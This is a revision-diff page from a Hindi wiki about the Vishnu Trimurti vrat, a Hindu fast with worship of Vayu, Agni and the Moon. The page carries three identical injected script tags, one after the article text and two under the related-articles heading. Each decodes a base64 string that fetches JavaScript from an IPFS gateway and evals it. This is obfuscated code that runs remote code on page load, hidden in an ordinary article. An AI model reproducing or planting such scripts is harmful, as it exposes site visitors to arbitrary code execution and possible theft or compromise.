Difference between revisions of "विष्णुत्रिमूर्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[विष्णु]] जी के तीन रूप हैं, यथा– [[वायु देवता|वायु]], [[चंद्र देवता|चन्द्र]] एवं [[सूर्य देवता|सूर्य]] ये तीनों रूप तीन लोकों की रक्षा करते हैं।  
 
*[[विष्णु]] जी के तीन रूप हैं, यथा– [[वायु देवता|वायु]], [[चंद्र देवता|चन्द्र]] एवं [[सूर्य देवता|सूर्य]] ये तीनों रूप तीन लोकों की रक्षा करते हैं।  
 
*यह देवता मनुष्यों के शरीर के भीतर वात, पित्त एवं कफ के रूप में विराजमान रहते हैं, इस प्रकार विष्णु के तीन स्थूल रूप हैं।  
 
*यह देवता मनुष्यों के शरीर के भीतर वात, पित्त एवं कफ के रूप में विराजमान रहते हैं, इस प्रकार विष्णु के तीन स्थूल रूप हैं।  
Line 10: Line 10:
 
*यदि तीन वर्षों तक किया जाए तो 5000 वर्षों तक स्वर्ग में स्थिति रहती है।<ref>विष्णुधर्मोत्तरपुराण (3|136|1-26)।</ref>
 
*यदि तीन वर्षों तक किया जाए तो 5000 वर्षों तक स्वर्ग में स्थिति रहती है।<ref>विष्णुधर्मोत्तरपुराण (3|136|1-26)।</ref>
 
 
 
 
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:45, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vishnu ji ke tin roop haian, yatha– vayu, chandr evan soory ye tinoan roop tin lokoan ki raksha karate haian.
  • yah devata manushyoan ke sharir ke bhitar vat, pitt evan kaph ke roop mean virajaman rahate haian, is prakar vishnu ke tin sthool roop haian.
  • jyeshth shukl paksh tritiya ko upavas karana chahie.
  • isamean vishnu ki pooja karani chahie.
  • prat: vayu pooja karani chahie.
  • madhyahn mean agni mean jau evan til se hom tatha ratri mean jal mean chandrapooja karani chahie.
  • ek varsh tak shukl paksh ki tritiya par pooja karani chahie.
  • isase svarg prapti hoti hai.
  • yadi tin varshoan tak kiya jae to 5000 varshoan tak svarg mean sthiti rahati hai.[1]

  <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vishnudharmottarapuran (3|136|1-26).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>